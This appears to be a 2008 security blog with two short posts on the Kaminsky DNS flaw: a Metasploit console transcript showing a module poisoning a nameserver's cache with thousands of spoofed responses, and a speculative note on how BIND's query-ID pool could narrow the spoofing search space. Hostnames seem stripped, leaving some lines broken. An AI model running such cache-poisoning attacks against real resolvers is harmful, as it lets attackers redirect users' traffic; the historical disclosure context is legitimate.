Wednesday, July 23, 2008


msf auxiliary(baliwicked_host) > exploit
[*] Targeting nameserver x.x.x.x for injection of as
[*] Querying recon nameserver for's nameservers...
[*] Got an NS record: 258801 IN NS
[*] Querying recon nameserver for address of
[*] Got an A record: 258801 IN A x.x.x.x
[*] Checking Authoritativeness: Querying x.x.x.x for
[*] is authoritative for, adding to list of nameservers to spoof as
[*] Attempting to inject a poison record for into x.x.x.x:34649...
[*] Sent 1000 queries and 10000 spoofed responses...
[*] Sent 2000 queries and 20000 spoofed responses...
[*] Poisoning successful after 2250 attempts: ==
[*] Auxiliary module execution completed

$ nslookup.exe
Address: x.x.x.x

Non-authoritative answer:

Wednesday, July 16, 2008

Weighing in on the DNS thing...

My quick thoughts on the Kaminsky DNS thing, though I'm a little late to the party. Apparently it's a real thing. I spoke with someone who's lucky enough to be in the Magical Inner Circle of Truth and he agreed.

I have nothing but wild speculation here. I read through the BIND source a little, and I may be barking up the wrong tree, but it looks like the resolver doesn't randomize the QID for every query. Rather, it keeps a QID pool and checks for collisions before assigning an ID. Therefore, if you were to send a large number of queries to a bogus server where they will time out, you could effectively take those QIDs out of play. If this is a server you control, you are then able to drastically reduce the search space, since you know which QIDs you don't have to try.

Just a thought.